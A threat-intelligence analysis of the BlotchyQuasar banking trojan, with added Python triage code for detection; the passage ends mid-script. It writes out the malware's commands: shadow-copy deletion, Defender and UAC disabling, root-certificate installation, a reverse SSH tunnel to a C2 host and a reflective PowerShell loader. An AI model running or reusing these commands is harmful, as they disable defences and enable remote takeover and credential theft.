In late April through May 2023, IBM Security X-Force found several phishing emails leading to packed executable files delivering malware we have named BlotchyQuasar, likely developed by a group X-Force tracks as Hive0129. BlotchyQuasar is hardcoded to collect credentials from multiple Latin American-based banking applications and websites used within public and private environments. Similar operations conducted in late 2022 have also been noted delivering an earlier variant of this modified QuasarRAT by likely Spanish-speaking actors.
BlotchyQuasar, which X-Force describes as a banking trojan due to it containing a hardcoded list of banking applications, was developed on top of the QuasarRAT codebase, and is under active development and supports a wide range of different custom commands. Some of the most interesting features include the installation of root certificates and proxy auto-config URLs, which may be used in conjunction with Google Chrome Kiosk mode to impersonate financial institutions.
BlotchyQuasar has various commands to install specific third-party tools such as PuTTY, RDP, Chrome/Opera Portable, AnyDesk, TightVNC, hidden-VNC, an NGINX server, a Node.js server, Remote Utilities, WinPwnage, and credential stealers. These are common post-exploitation tools that enable hands-on-keyboard attacks, including Remote Desktop Protocol (RDP) access and Server Message Block (SMB) tunneling.
Hive0129
Hive0129, tracked by X-Force since 2019, likely originates from South America with operations focused on targeting government and private entities, likely for financial data, business intelligence, and intellectual property information across Colombia, Ecuador, Chile, and Spain. Phishing emails are used to deliver commodity remote access trojans (RATs), such as Proyecto RAT, BitRAT, QuasarRAT, and most recently BlotchyQuasar. Phishing emails are designed to appear to be from Latin American government agencies and contain malicious attachments or links.
Analysis
Delivery
X-Force detected an email phishing campaign from late April to late May 2023 impersonating government agencies in Latin America. The emails are well written and claim to inform the recipient about their tax status (see screenshots below). The recipients are instructed to click on a link within the email, which supposedly leads to the document described. The URL, which is contained within the email as well as in an attached PDF, has been geofenced using links generated with the Geo Targetly service.
If the URL https[:]//gtly[.]to/gy3ga460X is requested from an IP address within a specific Latin American country, an encrypted, LZH-compressed archive (.LHA file) is downloaded. If not, the URL redirects the user to an official government website and the infection chain stops there.
The archive file can be decrypted via the password contained within the email and the PDF, which reveals a .NET executable, which in this case is identified as a RoboSki loader.
RoboSki is just one of the many different commodity .NET loaders and their variants, which have been found in infection-chains leading to the BlotchyQuasar RAT. However, these loaders are not just used by Hive0129, but are also common among low-profile threat actors deploying various kinds of RATs and stealers such as AgentTesla, FormBook or Lokibot, via phishing emails. Since attribution cannot be assessed based on open-source and commodity loaders alone, if the infection chain leads to the final payload BlotchyQuasar, it is more than likely associated with a Hive0129 campaign.
BlotchyQuasar — Hive0129’s banking trojan
Although simple detection engines will easily identify the final payload as plain QuasarRAT, it has actually been heavily modified to support a wide range of additional features and commands, effectively making it a banking trojan. Comparing the paths of the PDB (Program database) files, automatically created during compilation, shows that the modification of the QuasarRAT source code has been an ongoing project since at least early 2020. Since then, the developers have added numerous features, thereby creating a large number of different variants. Internally, the developers refer to the banking trojan project as NUCLEAR RAT.
The latest variant, observed in the campaign detailed above, is “Version 5 – 9058,” where 9058 corresponds to the port used for C2 communication.
Initialization
For the files in this campaign, upon execution, BlotchyQuasar begins by resolving its main C2 server, and decrypts a hardcoded base64 string to reveal a Pastebin URL. After downloading the text from Pastebin, it parses and decrypts it to retrieve the final C2 server:
ecuadorlab[.]work.gd:9058
The RAT also sets the client name to “NEW – <current_date_and_time>”, which will show up on the QuasarRAT C2 panel. To make sure it is only running as a single instance, a hardcoded mutex is created:
44474877AKs8XXT4SylAo2kAlUS2kYkala!
Next, the trojan attempts to determine the victim’s geolocation, by sending an HTTP request to:
http://ip-api[.]com/json/
If this is unsuccessful, it will fallback to:
http://freegeoip[.]net/xml/
If that fails to retrieve an IP as well, it will try to retrieve the public IP address through:
http://api.ipify[.]org/
Lastly, before installation, it will delete the Zone Identifier ADS (mark-of-the-web) from its original executable and set a list of internal configuration variables, including the install path and AES decryption keys for secure C2 communication.
Persistence and evasion
BlotchyQuasar creates a new scheduled task running every 3 minutes with the following command line:
schtasks /create /tn "<hardcoded_startup_name>" /SC MINUTE /MO 3 /RL HIGHEST /tr "<RAT_current_path>"
Additionally, in order to persist after startup, the RAT’s current path is added to a registry key under:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<hardcoded_startup_name>
If the instance is running with elevated privileges, BlotchyQuasar also deletes volume shadow copies from the system:
vssadmin delete shadows /all /quiet
and will instead store the scheduled task in a hardcoded system folder and use the following registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\<hardcoded_startup_name>
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\<hardcoded_startup_name>
Depending on privilege and the configuration parameter “UNINSUADEFEN,” a set of anti-virus features is disabled on the system. This is done in multiple batches, some of which contain redundant modifications.
First batch:
Registry key (HKLM hive) | New value
SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection | 0
SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware | 1
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring | 1
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring | 1
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection | 1
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable | 1
SOFTWARE\Microsoft\Security Center\UACDisableNotify | 1
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 0
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin | 0
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop | 0
SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware | 1
Via PowerShell:
powershell Get-MpPreference -verbose
Depending on the output (if the AV options are enabled), the following commands are run:
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableAntiSpyware $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisablePrivacyMode $true
Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true
Set-MpPreference -SubmitSamplesConsent 2
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -ModerateThreatDefaultAction 6
Set-MpPreference -LowThreatDefaultAction 6
Set-MpPreference -SevereThreatDefaultAction 6
Set-MpPreference -ExclusionProcess <hardcoded_install_name>
Set-MpPreference -ExclusionPath -ExclusionPath $ENV:APPDATA
Second batch:
Registry key | New value
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware | 1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction | 1
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\ServiceKeepAlive | 0
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ServiceKeepAlive | 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter\Enabled | 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SystemToast.SecurityAndMaintenance\Enabled | 0
HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WinDefend\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WinDefend\Start | 4
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinDefend\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WdBoot\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WdBoot\Start | 4
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WdBoot\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WdFilter\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WdFilter\Start | 4
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WdFilter\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WdNisDrv\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WdNisDrv\Start | 4
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WdNisDrv\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WdNisSvc\Start | 4
HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WdNisSvc\Start | 4
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WdNisSvc\Start | 4
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates\ForceUpdateFromMU | 0
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates\ForceUpdateFromMU | 0
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates\UpdateOnStartup | 0
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates\UpdateOnStartup | 0
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealTimeMonitoring | 1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealTimeMonitoring | 1
HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\SecurityHealthService | 4
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService | 4
HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\WdNisSvc | 3
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc | 3
HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\WinDefend | 3
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend | 3
Note that the HKEY_CURRENT_USER entries have no effect on Defender (its policy and service configuration are read from HKLM, and there is no SYSTEM\CurrentControlSet subtree under HKCU), but they are still useful host artifacts of this tooling.
Command and control
Before connecting to its C2 server, BlotchyQuasar will verify the successful installation and initialize the QuasarRAT keylogger if this has been specified in the configuration. The RAT has been designed to establish an encrypted session with its C2 server to receive various commands. QuasarRAT has countless built-in commands, but since the code is open-source, this analysis will only focus on commands which have been added at a later stage.
Bank app reconnaissance
BlotchyQuasar’s most important feature is the detection of specific online banking applications and reporting those to the C2 server. It does not wait for C2 commands but starts directly after initialization and runs in 5-second intervals. The trojan begins by grabbing the title of whichever window is currently in the foreground. This string is then compared against a series of hardcoded titles of common banking applications used in Latin America and added to the victim information shown on the C2 panel. Since it uses the title of the window, both browser windows with banking websites as well as specific desktop applications may be targeted.
Among the list are some of the most popular banks in Latin America, specifically Colombia, Ecuador, and Bolivia. The titles also show the trojan targeting both personal and enterprise applications used for financial transactions.
C2 commands
An overview of the full list of custom C2 commands can be found in the table below, with the detailed analysis reported further down.
C2 command name | C2 command arguments | Client behavior | File system artifacts | Registry artifacts
Backdo | C2_hostname, URL_exe, URL_ppk | Downloads two files and likely creates a reverse SSH tunnel listening at 10:10 and 15:10 | C:\Windows\System32\svchosts.exe; C:\Windows\System32\t1.ppk | none
BackDoUni | none | Uninstalls the backdoor | none | none
LogonW7 | URL_dll | Downloads and runs a file FLogonW7.dll, likely a fake login page to steal user credentials | <RAT_StartupPath>\FLogonW7.dll; %LOCALAPPDATA%\Microsoft\user.db | HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\KEY
InstallRPD | URL_exe, argument | Likely installs an RDP tool and runs the provided command | <RAT_StartupPath>\RDP.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\RDP
UpdateRPD | URL_txt | Updates the RDP version | <RAT_StartupPath>\Update.txt; C:\Program Files\RDP Wrapper\rdpwrap.ini | none
AP | URL_cer, chrome_arg, action | Adds an external root certificate to the enterprise store and replaces Google Chrome shortcuts with Google Chrome Portable | <RAT_StartupPath>\Fot.cer; %USERPROFILE%\Desktop\Google Chrome.lnk; %APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk; %APPDATA%\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk; %APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\*\Google Chrome.lnk; C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk; %APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk; C:\Users\Public\Desktop\Google Chrome.lnk | none
BS | action | Calls the SwitchDesktop() API with a new desktop handle. Returns message: “Blank screen started” | none | none
ActivarProyecto | URL_cert, URL_PAC | Allows the attacker to use a remote proxy auto-config file from the supplied URL. Together with the installation of the root certificate, this may be used to impersonate trusted websites by specifying an attacker-controlled server as a proxy. | <RAT_StartupPath>\Fot.cer | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect; HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
DesactivarProyecto | none | Deletes the proxy auto-config URL from the registry. | none | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
AnyD | URL_exe | Likely installs the AnyDesk remote desktop application. | %APPDATA%\Microsoft\SystemCertificates\AnyDesk.exe; C:\Windows\System32\config\systemprofile\AppData\Roaming\AnyDesk\service.conf; C:\Windows\System32\config\systemprofile\AppData\Roaming\AnyDesk\system.conf; C:\Windows\System32\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\AID
system | none | Copies itself into a folder under C:\Windows\System32 and creates a new scheduled task running with SYSTEM privileges. | C:\Windows\System32\<hardcoded_folder_name>\<hardcoded_install_name> | none
dllR | URL_txt | Downloads a .NET payload as Base64, which is stored in the registry. The payload is then reflectively loaded using PowerShell. A scheduled task called “MicrosoftUpdate” executes the payload on every logon event. | <RAT_StartupPath>\RevenRa.txt | HKCU\Software\Microsoft\MozillaPlugins\Data
Logon | Name, URL_dll | Runs a .NET DLL (either already stored in the registry, or else downloaded ad hoc). Likely an improved version of the “LogonW7” command | <RAT_StartupPath>\<Name>.dll; %LOCALAPPDATA%\Microsoft\user.db | HKCU\Software\Microsoft\MozillaPlugins\<Name>; HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\KEY
Pytho | URL_exe | Likely installs Python at C:\py | %TMP%\py.exe; C:\py | HKCU\Software\Classes\Applications\python.exe\shell\open\command; HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
HtmlVN_C | URL_install, URL_kiosk, action | Installs the TightVNC software. If run, this command also starts a local NGINX and a local Node.js server. It will then open the kiosk URL with Google Chrome running in kiosk mode, locking the user into the full-screen browser window | <RAT_StartupPath>\htmlvn_c.exe; %APPDATA%\DobleV | none
scanner | none | Runs three instances of main.py, which is likely a copy of WinPwnage, a Python script implementing various techniques for UAC bypass, persistence and privilege escalation. | C:\py\python.exe; C:\py\main.py | none
ChromeP | URL_exe, URL_cer | Likely installs Chrome Portable, installs a root certificate and copies existing user data over to the Chrome Portable installation directory. | <RAT_StartupPath>\Chrome.exe; <RAT_StartupPath>\Fot.cer; %APPDATA%\Chrome\Data\profile\Default | none
OperaP | URL_exe, URL_cer | Likely installs Opera Portable, installs a root certificate and copies existing user data over to the Opera Portable installation directory. | <RAT_StartupPath>\Opera.exe; <RAT_StartupPath>\Fot.cer; %APPDATA%\Opera\App\Opera\profile\data | none
Usoris | URL_exe | Installs the Remote Utilities software and creates a scheduled task to run it every 3 minutes. | %APPDATA%\Usoris\Usoris.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\UID
BY_UA_C | none | Attempts a UAC bypass using computerdefaults.exe | none | HKCU\Software\Classes\ms-settings\shell\open\command; HKCU\Software\Classes\ms-settings\shell\open\command\DelegateExecute
Hvn_c | URL_exe, argument | Likely installs an hVNC tool (hidden VNC) | <RAT_StartupPath>\NServises.exe | none
CerrarProceso | process_name | Kills all processes with the specified name. | none | none
metodo | ID | Likely runs a copy of WinPwnage, attempting to elevate privileges via a specific UAC bypass technique selected via the ID | none | none
Disadef | none | Runs the same functions as during initialization, to disable Windows Defender and UAC via various commands and registry alterations. | none | none
Rename | Name | Changes the client name, i.e. how the victim is displayed on the C2 panel. | none | none
Command: “Backdo” (C2_hostname, URL_exe, URL_ppk):
Firstly, two files are downloaded to
- C:\Windows\System32\svchosts.exe
- C:\Windows\System32\t1.ppk
Next, two scheduled tasks are created via the following commands:
schtasks /create /RU SYSTEM /tn Microsoft\Windows\Dev64Files\<hardcoded_startup_name> /SC DAILY /RI 5 /ST 10:10 /DU 00:10 /K /RL HIGHEST /TR "svchosts.exe t1@<C2_hostname> -P 443 -i t1.ppk -hostkey 5e:78:65:69:f9:9b:b0:a3:27:20:1a:76:d4:1c:f9:fa -2 -4 -T -C -R 33445:127.0.0.1:445 -R 33889:127.0.0.1:3389 -N -batch" /f
schtasks /create /RU SYSTEM /tn Microsoft\Windows\TDev64Files\DHdis\<hardcoded_startup_name> /SC DAILY /RI 5 /ST 15:10 /DU 00:10 /K /RL HIGHEST /TR "svchosts.exe t1@<C2_hostname> -P 443 -i t1.ppk -hostkey 5e:78:65:69:f9:9b:b0:a3:27:20:1a:76:d4:1c:f9:fa -2 -4 -T -C -R 33445:127.0.0.1:445 -R 33889:127.0.0.1:3389 -N -batch" /f
Judging by the command options (-batch, -N, -hostkey), the downloaded executable is likely a renamed copy of PuTTY’s command-line client (plink), and t1.ppk the private key used to authenticate to the attacker’s SSH server. In that case, the command creates two scheduled tasks that run daily at 10:10 and 15:10, repeating every 5 minutes for a duration of 10 minutes. Each task runs the same command line, using the downloaded private key, pinning the expected server host key, and setting other options such as compression (-C), SSH protocol version 2 (-2) and IPv4 only (-4), to open a reverse SSH tunnel: ports 33445 and 33889 on the attacker’s SSH server are forwarded back to the victim’s local ports 445 and 3389 (SMB and RDP). The reverse tunnel lets the attackers reach the host directly over RDP and SMB, tunneled inside an SSH session that runs over TCP port 443, so the outbound connection looks like HTTPS traffic.
If successful, the command returns the message: “BackDoor installed successfully, listening time 10:10 and 15:10.”
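A defender will most often meet this backdoor as a scheduled task definition (event ID 4698, or the XML under C:\Windows\System32\Tasks) rather than as the binary. The following Python is an editorial example added here and not part of X-Force’s analysis: it parses a schtasks line of the shape shown above, extracts the daily window, the C2 host and port, the key file and every -R reverse forward, and flags the combination of localhost SMB/RDP forwards over a web port. The sample task line is constructed from the command above with placeholder task and C2 names.

```python
"""Triage a schtasks-wrapped PuTTY/plink reverse-tunnel command such as the one Backdo installs."""
import re
import shlex
from dataclasses import dataclass, field

# Local services the report shows being exposed through the tunnel, by destination port.
SERVICE_BY_PORT = {22: "SSH", 445: "SMB", 3389: "RDP", 5900: "VNC"}

# Constructed sample: the first Backdo task from the report, with placeholder task and C2 names.
SAMPLE_SCHTASKS = (
    'schtasks /create /RU SYSTEM /tn Microsoft\\Windows\\Dev64Files\\Updater '
    '/SC DAILY /RI 5 /ST 10:10 /DU 00:10 /K /RL HIGHEST '
    '/TR "svchosts.exe t1@c2.example.invalid -P 443 -i t1.ppk '
    '-hostkey 5e:78:65:69:f9:9b:b0:a3:27:20:1a:76:d4:1c:f9:fa '
    '-2 -4 -T -C -R 33445:127.0.0.1:445 -R 33889:127.0.0.1:3389 -N -batch" /f'
)


@dataclass
class TunnelSpec:
    binary: str = ""
    user: str = ""
    host: str = ""
    port: int = 22
    keyfile: str = ""
    hostkey: str = ""
    remote_forwards: list = field(default_factory=list)  # (remote_listen_port, dest_host, dest_port)
    flags: list = field(default_factory=list)


def parse_tunnel_cmdline(cmd):
    """Pull the options that matter for triage out of a plink-style command line."""
    toks = shlex.split(cmd)
    spec = TunnelSpec(binary=toks[0])
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok in ("-P", "-i", "-hostkey", "-R") and i + 1 < len(toks):
            val = toks[i + 1]
            if tok == "-P":
                spec.port = int(val)
            elif tok == "-i":
                spec.keyfile = val
            elif tok == "-hostkey":
                spec.hostkey = val
            else:  # -R listen_port:dest_host:dest_port, the listener opens on the SSH server
                listen, dest_host, dest_port = val.rsplit(":", 2)
                spec.remote_forwards.append((int(listen), dest_host, int(dest_port)))
            i += 2
        elif tok.startswith("-"):
            spec.flags.append(tok)
            i += 1
        else:
            if "@" in tok and not spec.host:
                spec.user, spec.host = tok.split("@", 1)
            i += 1
    return spec


def exposed_services(spec):
    """Local services reachable from the attacker's SSH server through the reverse forwards."""
    return {
        SERVICE_BY_PORT.get(dport, "tcp/%d" % dport): lport
        for lport, dhost, dport in spec.remote_forwards
        if dhost in ("127.0.0.1", "localhost", "::1")
    }


SCHTASKS_OPT = re.compile(r'/(TR|ST|RI|DU|RU|TN|SC)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def parse_schtasks(cmd):
    """Collect the schedule fields and the wrapped /TR command from a schtasks /create line."""
    return {m.group(1).upper(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in SCHTASKS_OPT.finditer(cmd)}


def active_window(opts):
    """Daily window in which the task keeps retrying: /ST start plus /DU duration (HH:MM)."""
    sh, sm = (int(x) for x in opts["ST"].split(":"))
    dh, dm = (int(x) for x in opts["DU"].split(":"))
    end = (sh * 60 + sm + dh * 60 + dm) % (24 * 60)
    return opts["ST"], "%02d:%02d" % divmod(end, 60)


def triage(schtasks_cmd):
    """Summarise what the task gives the attacker and when."""
    opts = parse_schtasks(schtasks_cmd)
    spec = parse_tunnel_cmdline(opts["TR"])
    exposed = exposed_services(spec)
    return {
        "task": opts.get("TN"),
        "runs_as": opts.get("RU"),
        "window": active_window(opts),
        "retry_minutes": int(opts.get("RI", 0)),
        "c2": "%s:%d" % (spec.host, spec.port),
        "keyfile": spec.keyfile,
        "exposed": exposed,
        # Reverse-forwarding SMB/RDP out over a web port is the signature of this backdoor.
        "suspicious": bool(exposed) and spec.port in (80, 443),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_SCHTASKS))
```

For the sample line the result names SYSTEM as the run-as account, a 10:10 to 10:20 retry window, c2.example.invalid:443 as the SSH endpoint and SMB and RDP as the exposed services; the same parser applies to a forward (-L) tunnel, which it does not flag, because nothing on the victim is exposed.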
Command: “BackdoUni” ():
This command simply uninstalls the SSH backdoor by deleting the scheduled tasks.
Command: “LogonW7” (URL_dll):
A file is downloaded from the URL to
- <RAT_StartupPath>\FLogonW7.dll
The payload is a .NET DLL, and its function FLogonW7.Logon.Main() is run. After execution, the trojan will read a new file at %LOCALAPPDATA%\Microsoft\user.db and parse out strings from lines containing the string “Correct”. Finally, the result is relayed back to the C2 server and written to the registry at:
HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\KEY
The downloaded DLL is likely a fake login screen, prompting the user for credentials.
Command: “InstallRPD” (URL_exe, argument):
A file is downloaded from the URL to
- <RAT_StartupPath>\RDP.exe
Next, RDP.exe is executed with the supplied argument. Depending on the success of the command, either “True” or “False” is written to the registry at:
HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\RDP
The trojan is also capable of detecting unsupported versions, which it will send back to its C2 server. Example: “RDP function fully installed, but not supported with version: <RDP_version>, Update the .ini file”.
Command: “UpdateRPD” (URL_txt):
A file is downloaded from the URL to
- <RAT_StartupPath>\Update.txt
If RDP is already installed, it will copy the downloaded file to
- C:\Program Files\RDP Wrapper\rdpwrap.ini
Finally, the RDP executable is run with the -r option. On success, the following message is sent: “RDP Update .ini function sent completed.”
Command: “AP” (URL_cer, chrome_arg, action):
For action: “Activated AHEP”:
The command first verifies that the path
%APPDATA%\Chrome\chrome.exe
exists. If not, it will return the message: “To execute this function you must first install Chrome Portable”
A file is downloaded from the URL to
- <RAT_StartupPath>\Fot.cer
It runs the command
certutil -f -v -addstore -enterprise root "<RAT_StartupPath>\Fot.cer"
which will add the file as a root certificate to the enterprise store.
Next, the destination file of the following shortcuts is replaced with %APPDATA%\Chrome\chrome.exe (Portable Chrome)
%USERPROFILE%\Desktop\Google Chrome.lnk
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\*\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk (if Windows 7 or Windows 8)
and it will also delete the shortcut at
C:\Users\Public\Desktop\Google Chrome.lnk
Upon success, it returns the message “Fake Created”.
For action: “Desactivated”:
All shortcuts are reset to their original destination at one of
%PROGRAMFILES%\Google\Chrome\Application\chrome.exe
%PROGRAMFILES(x86)%\Google\Chrome\Application\chrome.exe
The message returned is “Normal Created”.
Command: “BS” (action):
If the action is “Start”, this command will call the SwitchDesktop() API with a new desktop handle and returns the message: “Blank screen started”. If the action is anything else, it switches back to the old desktop handle.
Command: “ActivarProyecto” (URL_cert, URL_PAC):
Starts by setting two registry keys used to configure proxy auto-config:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect = 0
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = <URL_PAC>
Proxy auto-config is a feature to specify which proxy to use for a specific URL. In this case, the URL may reference a remote proxy auto-config file (.pac), which could specify an attacker server to be used as a proxy when connecting to a banking website. However, in order for the browser to trust the malicious server, the attacker needs to install a matching root certificate on the victim’s machine. This is accomplished in the next step.
A file is downloaded from the URL to
- <RAT_StartupPath>\Fot.cer
It runs the command
certutil -f -v -addstore -enterprise root "<RAT_StartupPath>\Fot.cer"
which will add the file as a root certificate to the enterprise store.
The following command is run for less than a second before all processes whose name contains “iexplore” (Windows 7/8) or “msedge” are killed, presumably so the browser picks up the new proxy configuration:
C:\Program Files\Internet Explorer\iexplore.exe www.google.com
Finally, the command returns “Project Activated successfully URL = <URL_PAC>”
Command: “DesactivarProyecto” ():
The registry value is deleted via
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = ""
Again, Internet Explorer is launched for a split second. Lastly, the DNS cache is flushed as well with the command:
ipconfig /flushdns
The return message is: “Project Desactivated successfully URL = <old_PAC_URL>”.
Command: “AnyD” (URL_exe):
A file is downloaded from the URL to
- %APPDATA%\Microsoft\SystemCertificates\AnyDesk.exe
In addition, a new scheduled task is created via the command
schtasks /create /RU SYSTEM /tn Microsoft\Windows\SideShow\DevFiles\"DocSys" /SC DAILY /RI 10 /ST 09:10 /DU 00:20 /K /RL HIGHEST /TR "%APPDATA%\Microsoft\SystemCertificates\AnyDesk.exe" /f
The task is set to run daily at 09:10, every 10 minutes for a duration of 20 minutes.
After starting the task manually, a number of config files are modified: (note paths are different for x86)
C:\Windows\System32\config\systemprofile\AppData\Roaming\AnyDesk\service.conf:
ad.anynet.pwd_hash=ceeca0067355a44571dfe7f1d28932528ec2ddb20282d6b90eafd7a967a05e4a
ad.anynet.pwd_salt=619799b94de1c347bd508b98cd502800
C:\Windows\System32\config\systemprofile\AppData\Roaming\AnyDesk\system.conf:
ad.security.hear_audio=false
ad.security.control_input=false
ad.security.uaccess.hear_audio=false
ad.security.uaccess.control_input=false
C:\Windows\System32\config\systemprofile\AppData\Roaming\AnyDesk\user.conf:
ad.ui.alias_or_id=true
ad.privacy.image.show=0
ad.privacy.chat.path_cfg=0
ad.audio.playback_device=0.0.0.00000000.c5c59b2b-65eb-4a4b-b451-f73197d47034
ad.audio.transmit_mode=0
ad.audio.playback_mode=0
ad.audio.transmit_source=0.0.0.00000000.c5c59b2b-65eb-4a4b-b451-f73197d47034
ad.recording.incoming=false
ad.recording.outgoing=false
ad.print.mode=0
The pwd_hash/pwd_salt pair in service.conf pre-sets an unattended-access password, so the attacker can connect to the AnyDesk ID without the victim having to accept a session request; the same hash and salt recurring across hosts is therefore a useful pivot.
Finally, the AnyDesk ID is parsed from the config and written to the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\AID
Command: “system” ():
The original trojan executable is copied to a new folder under C:\Windows\System32. The name of the new install directory is a hardcoded string in the configuration and differs between samples.
Lastly, a new scheduled task is created, running the copied executable with SYSTEM privileges every minute. Return message is: “Run as System Successfully.”
Command: “dllR” (URL_txt):
A file is downloaded from the URL to
- <RAT_StartupPath>\RevenRa.txt
The text contents of the file are saved to the registry at
HKCU\Software\Microsoft\MozillaPlugins\Data
A PowerShell command Base64-decodes the payload and reflectively loads the .NET assembly into the PowerShell process, invoking its entry point:
[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Microsoft\MozillaPlugins).Data)).EntryPoint.Invoke($Null,$Null)
Finally, a scheduled task is created to execute the PowerShell command upon user logon and the original text file gets deleted.
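Because the assembly never touches disk, file-based scanning will miss the payload; the command line above is the durable artifact, and it reaches logs as the task’s action, a process creation event or a PowerShell script block (event ID 4104). The following Python is an editorial example added here, not X-Force code: it flags text that combines a reflective Assembly::Load, a FromBase64String decode and a Get-ItemProperty registry read, reports the key and value name that hold the payload, and offers a cheap check of whether the stored blob is a managed PE. The sample script blocks and the fake assembly blob are constructed for the example.

```python
"""Flag PowerShell that reflectively loads a Base64 .NET assembly pulled from the registry."""
import base64
import re

# Each indicator is one link of the dllR loader chain from the report. All three must be
# present for a hit; any one alone is common in legitimate administration scripts.
REFLECTIVE_LOAD = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", re.IGNORECASE)
BASE64_DECODE = re.compile(r"\[(?:System\.)?Convert\]::FromBase64String\s*\(", re.IGNORECASE)
REGISTRY_READ = re.compile(
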